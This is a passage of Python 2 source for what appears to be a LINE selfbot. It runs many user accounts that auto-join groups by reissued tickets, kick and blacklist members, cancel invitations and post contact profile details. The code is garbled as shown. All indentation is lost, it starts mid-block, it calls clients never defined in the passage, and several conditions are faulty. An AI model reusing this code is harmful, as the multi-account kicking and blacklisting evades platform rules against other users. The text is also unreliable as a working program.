Ti = ks.reissueGroupTicket(op.param1)
CL.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
#======================================================
if op.param3 in Bmid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
G = kc.getGroup(op.param1)
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
G = kt.getGroup(op.param1)
G.preventJoinByTicket = False
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
#=========================================================================
#===========================================
if op.type == 32:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki.cancelGroupInvitation(op.param1, matched_list)
if Bmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kk.cancelGroupInvitation(op.param1, matched_list)
if Cmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("^^",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kc.cancelGroupInvitation(op.param1, matched_list)
if op.type == 17:
if op.param3 in wait["blacklist"]:
if not op.param2 in Bots and admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
cl.sendText(op.param1,"blacklist users are not allowed to sign in -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param3}
cl.sendMessage(c)
if op.type == 17:
if wait["welcomemsg"] == True:
if op.param2 not in Bots:
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + wait["welmsg"]+ str(ginfo.name))
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
cl.sendText(op.param1,"please do not open link group-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
kicker.kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1,"you are prohibited from inviting-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 15:
if op.param2 in admin:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
if op.type == 19:
if op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
if op.type == 19:
if not op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots and admin:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kk.getGroup(op.param1)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kd.getGroup(op.param1)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kf.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ke.getGroup(op.param1)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ticket = ke.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#========================================================================
if Fmid in op.param3:
if op.param2 in Bots and admin:
pass
try:
kg.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kg.getGroup(op.param1)
X.preventJoinByTicket = False
kg.updateGroup(X)
Ti = kg.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kf.getGroup(op.param1)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
kh.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kh.getGroup(op.param1)
X.preventJoinByTicket = False
kh.updateGroup(X)
Ti = kh.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kg.getGroup(op.param1)
X.preventJoinByTicket = True
kg.updateGroup(X)
Ticket = kg.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
kj.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kj.getGroup(op.param1)
X.preventJoinByTicket = False
kj.updateGroup(X)
Ti = kj.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kh.getGroup(op.param1)
X.preventJoinByTicket = True
kh.updateGroup(X)
Ticket = kh.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kj.getGroup(op.param1)
X.preventJoinByTicket = True
kj.updateGroup(X)
Ticket = kj.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ko.getGroup(op.param1)
G.preventJoinByTicket = False
ko.updateGroup(G)
Ti = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kn.getGroup(op.param1)
X.preventJoinByTicket = True
kn.updateGroup(X)
Ti = kn.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#============================================================================
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
kk.like(url[25:58], url[66:], likeType=1001)
kc.like(url[25:58], url[66:], likeType=1001)
kt.like(url[25:58], url[66:], likeType=1001)
ks.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already in the blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"successfully load users into the blacklist")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"successfully removed from the blacklist")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + msg.contentMetadata["displayName"] + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + contact.displayName + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Mesage:\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
elif msg.contentType == 16:
if wait["contact"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help","help"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,helpt)
elif ("Group name:" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Group name:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
